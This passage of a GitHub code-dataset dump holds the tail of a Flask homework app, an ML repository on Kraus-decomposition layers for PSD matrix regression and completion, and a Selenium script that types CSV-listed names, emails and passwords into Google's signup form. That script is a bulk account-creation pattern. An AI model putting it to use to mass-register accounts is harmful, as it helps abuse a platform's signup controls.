str(request.form['username'])\n return redirect('/')\n\n\[email protected]('/')\ndef index():\n current_datetime = datetime.now()\n return get_homework(current_datetime.strftime(\"%Y-%m-%d\"))\n\n\[email protected]('/subjects/')\ndef subjects_page():\n return render_template('subjects.html', subjects_active=True)\n\n\[email protected]('/add_homework/<int:grade_id>/<int:subject_id>/', methods=[\"POST\"])\ndef on_add_homework(grade_id, subject_id):\n if not session['is_admin']:\n return not_enough_permissions()\n\n add_homework_db(grade_id, subject_id, str(request.form['data']))\n\n return redirect('/subjects/%s' % subject_id)\n\n\[email protected]('/add_subject/', methods=[\"POST\"])\ndef add_subject():\n if not session['is_admin']:\n return not_enough_permissions()\n\n add_subject_db(str(request.form['title']))\n\n return redirect('/subjects/')\n\n\n# displays not enough permissions error page\ndef not_enough_permissions():\n return render_template('not_enough_permissions.html')\n\n\[email protected]('/delete_subject/<int:subject_id>/')\ndef remove_subject(subject_id):\n if not session['is_admin']:\n return not_enough_permissions()\n\n delete_subject_id(subject_id)\n return redirect(url_for('subjects_page'))\n\n\[email protected]('/subjects/<int:subject_id>/')\ndef draw_subject(subject_id):\n return render_template('homeworks.html', subjects_active=True, subject_id=subject_id,\n homeworks_array=get_homeworks(session['grade_selected_id'], subject_id))\n\n\[email protected]('/project/')\ndef about_project():\n return render_template('project.html', project_active=True)\n\n\[email protected]('/<path:resource>')\ndef serve_static_resource(resource):\n return send_from_directory('static/', resource)\n\n\nclass JCalendar: # how java's calendar looks in JSON\n def __init__(self, year, month, dayOfMonth, hourOfDay, minute, second):\n self.year = year\n self.month = 
month - 1\n self.dayOfMonth = dayOfMonth\n self.hourOfDay = hourOfDay\n self.minute = minute\n self.second = second\n\n\ndef encode_b(obj): # JSON encode function\n if isinstance(obj, datetime):\n serial = JCalendar(obj.year, obj.month, obj.day, obj.hour, obj.minute, obj.second) # we need Java like calendar\n\n return serial.__dict__\n return obj.__dict__\n\n\[email protected](\"/get_json/\") # API for Java JSON\ndef json_api():\n json_data = {}\n json_data['grades'] = get_all_grades()\n json_data['subjects'] = get_all_subjects()\n json_data['homeworks'] = get_all_homeworks()\n json_data['day_elements'] = get_all_day_db()\n\n return json.dumps(json_data, default=encode_b)\n\n\nif __name__ == '__main__':\n app.run()\n" } ]
4
jroghair/Selenium-Programs
https://github.com/jroghair/Selenium-Programs
69e36d6c213342e4d85bbe0ba9dcffa310323a1d
3564ed2afd8e2d14eb86bce166aa910cb1e2f892
43475826ba9afc2d30e155bcc0ec08308faa054d
refs/heads/master
2020-05-18T21:48:53.171358
2019-05-03T00:12:39
2019-05-03T00:12:39
184,673,180
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7101910710334778, "alphanum_fraction": 0.728025496006012, "avg_line_length": 34.681819915771484, "blob_id": "f79c81cb75a3c30622a8345999202c20290d5920", "content_id": "3015c9d05218324be24f8aa4e4ed7cd8a125c10a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 175, "num_lines": 44, "path": "/GoogleAccountFillForm.py", "repo_name": "jroghair/Selenium-Programs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 02 00:02:17 2019\n\n@author: Jeremy Roghair\n\"\"\"\n\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport pandas as pd\n\n#users = pd.read_csv(\"C:\\\\Users\\\\jrogh\\\\OneDrive\\\\Documents\\\\RA Position - Sukul\\\\Question 2 - Scraper Output.csv\")\nos.chdir(os.getcwd())\n#Users.csv contains list of first/last names, emails and passwords\nusers = pd.read_csv(\"Users.csv\")\n\nchrome_driver_path = \"C:\\Program Files (x86)\\Google\\ChromeDriver\\chromedriver.exe\"\noptions = Options()\ndriver = webdriver.Chrome(chrome_driver_path, options=options)\n#Navigate to google account creation website\ndriver.get(\"https://accounts.google.com/signup/v2/webcreateaccount?continue=https%3A%2F%2Fwww.google.com%2F&hl=en&gmb=exp&biz=false&flowName=GlifWebSignIn&flowEntry=SignUp\") \n\n#Find the elements for all required fields\nfirst = driver.find_element_by_id('firstName')\nlast = driver.find_element_by_id('lastName')\nuserName = driver.find_element_by_id('username')\npw1 = driver.find_element_by_name('Passwd')\npw2 = driver.find_element_by_name('ConfirmPasswd')\n\n#Runs through list of users and fills the google account creation for each\nfor i in range(len(users)):\n first.send_keys(users.iloc[i]['First_Name'])\n last.send_keys(users.iloc[i]['Last_Name'])\n userName.send_keys(users.iloc[i]['Email'])\n pw1.send_keys(users.iloc[i]['Password'])\n pw2.send_keys(users.iloc[i]['Password'])\n sleep(2) \n first.clear()\n last.clear()\n userName.clear()\n pw1.clear()\n pw2.clear()\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 30, "blob_id": "461c8769c2e77495df336f323ed008294e1435fc", "content_id": "e8a88e68d65c9bdb519e5baa37b91bcca1a05252", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/README.md", "repo_name": "jroghair/Selenium-Programs", "src_encoding": "UTF-8", "text": "# Selenium-Programs\nPrograms I've developed to learn selenium \n" } ]
2
ShadowproofGamer/zad75
https://github.com/ShadowproofGamer/zad75
e8f54dbfee4e210c1c5b9045cb9534e45028a02c
0e762b9f286a0a3f67d684c789e876f3a76c8050
934fa4e12d085d9931b942edcc1c5f9e2f42c3fa
refs/heads/master
2023-01-10T21:38:15.070170
2020-11-09T11:25:32
2020-11-09T11:25:32
311,316,262
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5435048937797546, "alphanum_fraction": 0.594975471496582, "avg_line_length": 29.811321258544922, "blob_id": "c6ae2dad69ac9d6ed61d5bc200d6e74fedf121c7", "content_id": "19ee0d3ed007e639af23174691ed2926722bd3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 223, "num_lines": 53, "path": "/zad75.py", "repo_name": "ShadowproofGamer/zad75", "src_encoding": "UTF-8", "text": "slownik = {}\nfor i in range(97, 123):\n slownik[chr(i)] = (i-97)\n#print(slownik)\n\ndef podstawienie(litera, A, B):\n temp = slownik[litera]*A+B\n if temp>25:\n temp%=26\n #print(chr(temp+97))\n return chr(temp+97)\n\ndef szyfrowanie(slowo, A, B):\n slowo_szyfr = ''\n for i in slowo:\n slowo_szyfr+=podstawienie(i, A, B)\n return slowo_szyfr\n\ndef deszyfrowanie(slowo_szyfr, A, B):\n slowo = ''\n for i in slowo_szyfr:\n slowo+=podstawienie(i, A, B)\n return slowo\n\ndef znajdowanie_klucza(slowo1, slowo2):\n slowo1_len = len(slowo1)\n slowo2_len = len(slowo2)\n for A in range(0, 26):\n for B in range(0, 26):\n if podstawienie(slowo2[0], A, B) == slowo1[0] and podstawienie(slowo2[1], A, B) == slowo1[1] and podstawienie(slowo2[2], A, B) == slowo1[2] and podstawienie(slowo2[slowo2_len-1], A, B) == slowo1[slowo1_len-1]:\n print('klucz deszyfrujacy: A=', A, 'B=', B)\n elif podstawienie(slowo1[0], A, B) == slowo2[0] and podstawienie(slowo1[1], A, B) == slowo2[1] and podstawienie(slowo1[2], A, B) == slowo2[2] and podstawienie(slowo1[slowo1_len-1], A, B) == slowo2[slowo2_len-1]:\n print('klucz szyfrujacy: A=', A, 'B=', B)\n\nplik=open('tekst.txt')\ndane=plik.read().split()\nprint('punkt1:')\nfor i in dane:\n if i[0]==i[len(i)-1]:\n print(i)\n\nprint(\"punkt2:\")\nfor j in dane:\n if len(j)>=10:\n print(szyfrowanie(j, 5, 2))\n\nprint(\"punkt3:\")\nplik.close()\nplik2=open('probka.txt')\ndane2=plik2.read().split()\nfor k in range(0, len(dane2), 2):\n print(dane2[k], dane2[k+1])\n znajdowanie_klucza(dane2[k], dane2[k+1])" } ]
1
mofushaohua/partial_trace_kraus
https://github.com/mofushaohua/partial_trace_kraus
dd14bcc08c8018688772a849492c6d686894c4a5
b3fc610f32ffc2c9b0a57a10eb7400cbf585aebf
45e1b2ebac3bee9bf459b8947c2257b91bc87cd2
refs/heads/master
2023-03-20T09:05:41.546856
2020-07-03T11:37:09
2020-07-03T11:37:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5229007601737976, "alphanum_fraction": 0.5343511700630188, "avg_line_length": 24.354839324951172, "blob_id": "cfd1f59932453201f7d647cdacbec0f4cbff573d", "content_id": "6f8d7ceca6d66d5b3b0e66ae5372dbdbe6ac1b4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 786, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/util.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import time as time\nimport torch\n\ndef build_random_A(m,p,d, device = 'cpu'): \n A = torch.randn(m,p,d, device = device)\n A = A/torch.max(torch.abs(A))\n return A\n\ndef build_X(n,d, device = 'cpu'):\n \"\"\" create n input covariance matrix of size d x d\n from random matrix\n \"\"\"\n X = torch.zeros((n,d,d), device = device)\n for i in range(n):\n aux = torch.randn((d,d), device = device)\n X[i] = aux.t()@aux + torch.eye(d)*0.00\n return X\n\n\ndef build_Y(n,X,A, noise = 0 , device = 'cpu'):\n n = X.size(0)\n m = A.size(0)\n p = A.size(1)\n Y = torch.zeros((n,p,p), device = device)\n for i in range(n):\n for j in range(m):\n Y[i] += A[j]@X[i]@A[j].t()\n return Y\n" }, { "alpha_fraction": 0.6090794205665588, "alphanum_fraction": 0.6103404760360718, "avg_line_length": 27.296297073364258, "blob_id": "596640f9501605fe026107999ac85ef3f94d97ab", "content_id": "23c1573a85caff78af0c46d230ba74cbbdb268ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/PSDReluLayer.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n# projection to the nearest PSD matrix\r\n\r\nimport keras\r\nimport tensorflow as tf\r\nfrom keras.engine.topology import Layer\r\n\r\nclass PSDReluLayer(Layer):\r\n\r\n def __init__(self, eps, **kwargs):\r\n self.eps = eps\r\n super(PSDReluLayer, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n # Create a trainable weight variable for this layer.\r\n super(PSDReluLayer, self).build(input_shape)\r\n\r\n def call(self, x):\r\n\r\n s, u, v = tf.linalg.svd(x)\r\n a = tf.math.maximum(s, tf.multiply(self.eps, tf.ones_like(s)))\r\n x_relu = tf.matmul(u, tf.matmul(tf.linalg.diag(a), v, adjoint_b=True))\r\n return x_relu\r\n\r\n def compute_output_shape(self, input_shape):\r\n return input_shape\r\n\r\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5903890132904053, "avg_line_length": 32.44736862182617, "blob_id": "022d5ba6ae3e8c92d2e5fa8e0aea003292a69778", "content_id": "50c64d82612922da479d37372a1ab515d4d7dbbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 143, "num_lines": 38, "path": "/KrausLayer.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n\r\nfrom keras import backend as K\r\nfrom keras.engine.topology import Layer\r\nimport numpy as np\r\nfrom keras.regularizers import *\r\nfrom keras.initializers import *\r\nimport tensorflow as tf\r\n\r\nclass KrausLayer(Layer):\r\n\r\n def __init__(self, output_dim, rank, **kwargs):\r\n self.output_dim = output_dim\r\n self.rank = rank\r\n super(KrausLayer, self).__init__(**kwargs)\r\n\r\n def build(self, 
input_shape):\r\n # Create a trainable weight variable for this layer.\r\n self.Ai = self.add_weight(name=\"Ai\", shape=(self.rank, self.output_dim, input_shape[-1]), initializer='glorot_uniform', trainable=True)\r\n super(KrausLayer, self).build(input_shape) \r\n\r\n def call(self, x):\r\n\r\n tmp = K.dot(self.Ai[0], x)\r\n tmp = K.permute_dimensions(tmp, [1,0,2])\r\n Y0 = K.dot(tmp, tf.transpose(self.Ai[0]))\r\n acc = [Y0]\r\n for r in range(1, self.rank):\r\n tmp = K.dot(self.Ai[r], x)\r\n tmp = K.permute_dimensions(tmp, [1,0,2])\r\n Yr = K.dot(tmp, tf.transpose(self.Ai[r]))\r\n acc.append(Yr)\r\n Y = tf.reduce_sum(acc, axis=0)\r\n return Y\r\n\r\n def compute_output_shape(self, input_shape):\r\n return (input_shape[0], self.output_dim, self.output_dim)\r\n\r\n" }, { "alpha_fraction": 0.5723270177841187, "alphanum_fraction": 0.590745747089386, "avg_line_length": 29.488584518432617, "blob_id": "d2e9e6be29b695cdd44486c671bf0f6185491395", "content_id": "5ac528502872f93f99b99314e0fe65acbf955bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6678, "license_type": "no_license", "max_line_length": 387, "num_lines": 219, "path": "/completion_kraus.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# script to build deep kraus model for SPD matrix completion \n# train and evaluate from data generated by make_data_completion.py\n#\n\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport matplotlib.pyplot as plt\nimport keras\nfrom keras.models import Sequential\nfrom keras import backend as K\nfrom keras.layers import Activation, Dropout, BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom KrausLayer import KrausLayer\nfrom PSDReluLayer import PSDReluLayer\nimport tensorflow as tf\nimport numpy as np\nimport sys\n\ndef mse_masked_loss(y_true, y_pred):\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n diff = tf.multiply(tf.square(y_pred-y_true), mask)\n loss = tf.reduce_mean(diff)\n return loss\n\nrescale_prediction = True\n\nbatch_size = 4\nepochs = 50\n\n#context=\"100_7_4_3\"\n\ntry:\n context = sys.argv[1]\n fold = int(sys.argv[2])\nexcept:\n fold = 0\n print('usage: '+sys.argv[0]+' <context> <fold> <rank> <depth> <intermediate_dims>')\n print('default: fold = 0; rank = 10; depth = 1 ; intermediate_dims = 15')\n\ncontext2 = context + '_'+str(fold)\nprint('context', context, context2)\nn = int(context.split('_')[0])\n\ntry:\n rank = int(sys.argv[3])\nexcept:\n rank = 10\n\ntry:\n depth = int(sys.argv[4])\n intermediate_dims = int(sys.argv[5])\nexcept:\n depth = 1\n intermediate_dims = -1\n\ntry:\n nl = int(sys.argv[6]) # non linearity\nexcept:\n nl = 0\n\ntry:\n eps = float(sys.argv[7])\nexcept:\n eps = 0.0001\n\nfilename = 'results_completion3/'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.out'\nprint(filename)\n\n# reset given model\ndef reset_weights(model):\n session = K.get_session()\n for layer in model.layers: \n if isinstance(layer, keras.engine.network.Network):\n reset_weights(layer)\n continue\n for v in layer.__dict__.values():\n if hasattr(v, 'initializer'):\n v.initializer.run(session=session)\n\n# the data, generated by toy_experiments.py\ntry:\n M = np.load('data/completion/M_'+context2+'.npy')\nexcept:\n M = np.load('data/completion/M_'+context+'.npy')\nM_atrou = np.load('data/completion/M_atrou_'+context2+'.npy')\nX = 
np.load('data/completion/X_'+context2+'.npy')\nY = np.load('data/completion/Y_'+context2+'.npy')\nXt = np.load('data/completion/Xt_'+context2+'.npy')\nYt = np.load('data/completion/Yt_'+context2+'.npy')\n\nn_max = 3500\nn = X.shape[0]\nif n > n_max:\n l_idx = list(range(n_max))\n np.random.shuffle(l_idx)\n l_idx = l_idx[:n_max]\n X = X[l_idx]\n Y = Y[l_idx]\n\np = X.shape[-1]\nq = Y.shape[-1]\n\nvmin = float(np.min(M))\nvmax = float(np.max(M))\n\ninput_shape = X[0].shape\n\nmodel = Sequential()\n\nfor d in range(depth):\n dims = intermediate_dims\n if d == depth - 1: dims = Y[0].shape[0]\n if d == 0: model.add(KrausLayer(dims, rank, input_shape=input_shape))\n else: model.add(KrausLayer(dims, rank))\n if nl > 0 and d < depth - 1: model.add(PSDReluLayer(eps))\nprint(model.summary())\nmodel.compile(loss=mse_masked_loss, optimizer=keras.optimizers.Adam())\n\nscores = []\ndiffs = []\nrepeat = 1\nbest = 10000\nfor i in range(repeat): # repeat learning n times\n reset_weights(model)\n loss = model.fit(X, Y, batch_size=batch_size, epochs=epochs, verbose=1)\n mse = model.evaluate(Xt, Yt, verbose=0)\n scores.append(mse)\n print('mse = ', mse)\n\n ## reconstruct complete M matrix\n mat = np.array(M_atrou)\n mat_atrou = np.array(M_atrou)\n\n # make mask\n mask = np.array(M_atrou)\n mask[mask > 0.] = 1.\n\n # make reverse mask\n rmask = np.array(M_atrou)\n rmask[rmask > 0.] = -1.\n rmask[rmask == 0.] = 1.\n rmask[rmask == -1.] = 0.\n\n # predict and only replace missing values\n Ypred = model.predict(Xt)\n for j in range(Xt.shape[0]):\n c = np.where(Xt[j] == 1.)\n p1, p2 = int(c[0]), int(c[1])\n idx = slice(p1*q,(p1+1)*q)\n idy = slice(p2*q,(p2+1)*q)\n \n # rescale prediction to fit existing entries\n if rescale_prediction:\n mask = np.array(Yt[j])\n mask[mask > 0.] 
= 1.\n yt = np.multiply(Yt[j], mask)\n yp = np.multiply(Ypred[j], mask)\n \n try:\n emin = np.min(yt[np.nonzero(yt)])\n emax = np.max(yt[np.nonzero(yt)])\n except:\n emin = 0.\n emax = 1.\n \n try:\n pmin = np.min(yp[np.nonzero(yp)])\n pmax = np.max(yp[np.nonzero(yp)])\n except:\n pmin = 0.\n pmax = 1.\n\n if pmax - pmin > 0.00001:\n Ypred[j] = (Ypred[j] - pmin) / (pmax - pmin)\n else:\n Ypred[j] = Ypred[j] - pmin\n if emax - emin > 0.00001:\n Ypred[j] = Ypred[j] * (emax - emin) + emin\n else:\n Ypred[j] = Ypred[j] + emin\n \n mat[idx, idy] += np.multiply(Ypred[j], rmask[idx, idy])\n \n # evaluate difference with original matrix\n diff = np.linalg.norm(M - mat)\n diffs.append(diff)\n print('diff:', diff, 'diff_atrou', np.linalg.norm(M - mat_atrou))\n \n if (diff > 1000): sys.exit(0)\n\n if diff < best:\n best = diff # keep track of the best run so far\n # save only the best fold\n plt.figure()\n plt.matshow(M, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_orig_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.png')\n plt.close()\n\n plt.figure()\n plt.matshow(mat_atrou, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_atrou_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.png')\n plt.close()\n\n plt.figure()\n plt.matshow(mat, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_compl_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.png')\n plt.close()\n\n np.save('results_completion3/M_compl_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.npy', mat)\n\nprint('mean mse:', np.mean(scores), np.std(scores))\nprint('mean diff:', np.mean(diffs), np.std(diffs))\n\nf = open(filename, 'w')\nf.write('Train loss: '+ str(loss.history['loss'][-1])+ ' Test loss: '+ str(np.mean(scores))+' '+ str(np.std(scores))+' Norm: ' + str(np.mean(diffs)) + ' ' + str(np.std(diffs)) + ' n: '+ str(n)+' '+ str(fold)+ ' rank: '+ str(rank)+ ' depth: '+ str(depth)+ ' intermediate_dims: '+ str(intermediate_dims)+ ' nl: '+ str(nl)+' eps: '+str(eps)+ ' nb_params '+ str(model.count_params()) + '\\\\n')\nf.close()\n\n" }, { "alpha_fraction": 0.6744412183761597, "alphanum_fraction": 0.738581120967865, "avg_line_length": 34.44827651977539, "blob_id": "20e63101602872d493cad838f43f9aabeece62a6", "content_id": "2fa01dec5d0a9926397d6686f13702561ced2aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 131, "num_lines": 29, "path": "/README.md", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# partial_trace_kraus\n\nThis repository contains the code for the paper \"Partial Trace Regression and Low-Rank Kraus Decomposition\" published at ICML 2020.\n\nhttps://arxiv.org/pdf/2007.00935.pdf\n \nThis repository is still under construction.\n\n# Required environment\n - Anaconda3\n - TensorFlow 1.13.1 \n - Keras 2.2.4\n - torch 1.1.0\n\n# Code to build models\n - KrausLayer.py : implements Kraus decomposition as a keras layer\n - PSDReluLayer.py : relu for PSD matrix\n - spd2spd_kraus.py : PSD to PSD matrix regression, section 3.1\n - completion_kraus.py : PSD matrix completion, section 3.2\n\n# To generate simulated data\n - make_data_spd2spd.py generates toy data for PSD to PSD matrix regression\n - make_data_completion.py generates toy data for PSD matrix completion\n - util.py is required 
for previous scripts to build kraus model\n\n# To execute the code\n* run for example (see the code files for args): \n - python spd2spd_kraus.py 10000_20_10_5 0 5 2 15 1 0.1\n - python completion_kraus.py 90_20_10_0_4 0 50 2 50 1 0.1\n\n" }, { "alpha_fraction": 0.5488647818565369, "alphanum_fraction": 0.5676209330558777, "avg_line_length": 29.696969985961914, "blob_id": "dd491e94477589708f7b79cfb2d79ba316d8b6b9", "content_id": "c65342c0b358fb1b260a2c94294d5dc46724134a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/make_data_spd2spd.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Generates various toy data for PSD to PSD experiments\n\nimport sys\nimport numpy as np\nimport torch\nfrom util import build_random_A, build_X, build_Y\n\nnoise = 0.1 \n\n\ndevice = torch.device('cpu') #('cuda')\n\nt = 1\nn, n_test = int(sys.argv[1]), 1000\nm = int(sys.argv[2]) # kraus rank \nd, p = int(sys.argv[3]), int(sys.argv[4])\n\nnb_trial = 10\n\nfor i in range(nb_trial):\n \n A = build_random_A(m,p,d,device = device)\n X = build_X(n,d,device)\n Y = build_Y(n,X,A,noise = noise,device = device)\n Xt = build_X(n_test,d,device)\n Yt = build_Y(n_test,Xt,A,noise = noise,device = device)\n\n np.save('data/spd2spd/X_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', X)\n np.save('data/spd2spd/Y_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Y)\n np.save('data/spd2spd/Xt_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Xt)\n np.save('data/spd2spd/Yt_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Yt)\n" }, { "alpha_fraction": 0.6347492933273315, "alphanum_fraction": 0.6570334434509277, "avg_line_length": 30.217391967773438, "blob_id": "54af3e6787ab388c0fde51529ab237fa65233635", "content_id": "fc8aa76757d87ba0f602887e7497de603cd45508", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 320, "num_lines": 92, "path": "/spd2spd_kraus.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# script to build a deep kraus decomposition model for SPD to SPD matrices mapping\n# train and evaluate on toy data generated by make_data.sh\n\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport keras\nfrom keras.models import Sequential\nfrom keras import backend as K\nfrom keras.layers import Activation, Dropout, BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom KrausLayer import KrausLayer\nfrom PSDReluLayer import PSDReluLayer\nimport numpy as np\nimport sys\n\nbatch_size = 16\nepochs = 200\n\ncontext = '10000_100_40_20'\n\ntry:\n context = str(sys.argv[1])\n fold = int(sys.argv[2])\nexcept:\n fold = 0\n print('usage: '+sys.argv[0]+' <context> <fold> <rank> <depth> <intermediate_dims>')\n print('default: rank = 10; depth = 1 ; intermediate_dims = 15')\n sys.exit(0)\n\ncontext2 = context + '_' + str(fold)\n\ntry:\n rank = int(sys.argv[3])\nexcept:\n rank = 10\n\ntry:\n depth = int(sys.argv[4])\n intermediate_dims = int(sys.argv[5])\nexcept:\n depth = 1\n intermediate_dims = -1\n\ntry:\n nl = int(sys.argv[6]) # non linearity ?\nexcept:\n nl = 0\n\ndef reset_weights(model):\n session = K.get_session()\n for layer in 
model.layers: \n if isinstance(layer, keras.engine.network.Network):\n reset_weights(layer)\n continue\n for v in layer.__dict__.values():\n if hasattr(v, 'initializer'):\n v.initializer.run(session=session)\n\n# load the data, generated by make_data_spd2spd.py\nX = np.load('data/spd2spd/X_'+context2+'.npy')\nY = np.load('data/spd2spd/Y_'+context2+'.npy')\nXt = np.load('data/spd2spd/Xt_'+context2+'.npy')\nYt = np.load('data/spd2spd/Yt_'+context2+'.npy')\n\ninput_shape = X[0].shape\n\n# build model\nmodel = Sequential()\nfor d in range(depth):\n dims = intermediate_dims\n if d == depth - 1: dims = Y[0].shape[0]\n if d == 0: model.add(KrausLayer(dims, rank, input_shape=input_shape))\n else: model.add(KrausLayer(dims, rank))\n if nl > 0 and d < depth - 1: model.add(PSDReluLayer(0.1))\nprint(model.summary())\nmodel.compile(loss=keras.losses.mse, optimizer=keras.optimizers.Adam(0.001))\n\n# train and evaluate\nscores = []\nfor i in range(5):\n reset_weights(model)\n loss = model.fit(X, Y, batch_size=batch_size, epochs=epochs, verbose=1)\n mse = model.evaluate(Xt, Yt, verbose=0)\n scores.append(mse)\n print(\"mse = \", mse, \"iter = \", i)\n \nf = open('results_spd2spd/'+str(context)+'_'+str(fold)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.out', 'w')\nf.write('Train loss: '+ str(loss.history['loss'][-1])+ ' Test loss: '+ str(np.mean(scores))+' '+ str(np.std(scores))+ ' context: '+ str(context)+' '+ str(fold)+ ' rank: '+ str(rank)+ ' depth: '+ str(depth)+ ' intermediate_dims: '+ str(intermediate_dims)+ ' nl '+ str(nl)+ ' nb_params '+ str(model.count_params()) + '\\\\n')\nf.close()\n" }, { "alpha_fraction": 0.4763142168521881, "alphanum_fraction": 0.4933040142059326, "avg_line_length": 32.80067443847656, "blob_id": "69a37bfcef63af957f11efabe894cc7cb41483ed", "content_id": "24c844b4ff941b09b6324e6f5331a91a90d45ac3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10006, "license_type": "no_license", "max_line_length": 125, "num_lines": 296, "path": "/make_data_completion.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Generates various toy data for PSD matrix completion experiments\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom util import build_random_A, build_X, build_Y\nimport argparse\n\n\ndef completion_accuracy(orig, pred):\n\n if np.linalg.norm(pred, ord='fro') == 0: #\n return 1 - np.trace(np.dot(orig, pred)) / np.linalg.norm(orig, ord='fro')\n\n return 1 - np.trace(np.dot(orig, pred))/(np.linalg.norm(orig, ord='fro')*np.linalg.norm(pred, ord='fro'))\n\n\ndef mat_to_vec(X, Y):\n n = X.shape[0]\n d = X.shape[1]\n p = Y.shape[1]\n Xnp = np.zeros((n, (d * d)))\n Ynp = np.zeros((n, (p * p)))\n for i in range(n):\n aux = X[i].numpy()\n Xnp[i] = np.reshape(aux, -1)\n aux = Y[i].numpy()\n Ynp[i] = np.reshape(aux, -1)\n return Xnp, Ynp\n\n\ndef vec_to_mat(Xv, Yv):\n n = Xv.shape[0]\n d = int(np.sqrt(Xv.shape[1]))\n p = int(np.sqrt(Yv.shape[1]))\n X = np.zeros((n, d, d))\n Y = np.zeros((n, p, p))\n for ii in range(n):\n aux = Xv[ii].detach().numpy()\n X[ii] = np.reshape(aux, (d, d), order='F')\n aux = Yv[ii].detach().numpy()\n Y[ii] = np.reshape(aux, (p, p), order='F')\n return X, Y\n\n\ndef vec_to_mat1(Yv):\n n = Yv.shape[0]\n pp = int(np.sqrt(Yv.shape[1]))\n Y = np.zeros((n, pp, pp))\n for ii in range(n):\n aux = Yv[ii]\n Y[ii] = np.reshape(aux, (pp, pp), order='F')\n return Y\n\n# ================= 
parameters =================\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', action='store', dest='n', default=24, type=int,\n help='number of samples ')\nparser.add_argument('-p', action='store', dest='p', default=7, type=int,\n help='dataset type ') # ok\nparser.add_argument('-q', action='store', dest='q', default=4, type=int,\n help='dataset type ') # ok\nparser.add_argument('-r', action='store', dest='r', default=10, type=int,\n help='kraus rank ') # ok\nparser.add_argument('-m', action='store', dest='m', default=14, type=int,\n help='dataset type ')\n\narguments = parser.parse_args()\nn = arguments.n # number of samples per class\np = arguments.p\nq = arguments.q\nr = arguments.r\nm = arguments.m # method of trou creation\n# noise = arguments.s\n\n\n# ================= get the data =================\n\n\nif m < 3 and n%2 != 0: # if can't make symmetric matrices with this n take one less training sample\n n = n-1\n\n\ndevice = torch.device('cpu') 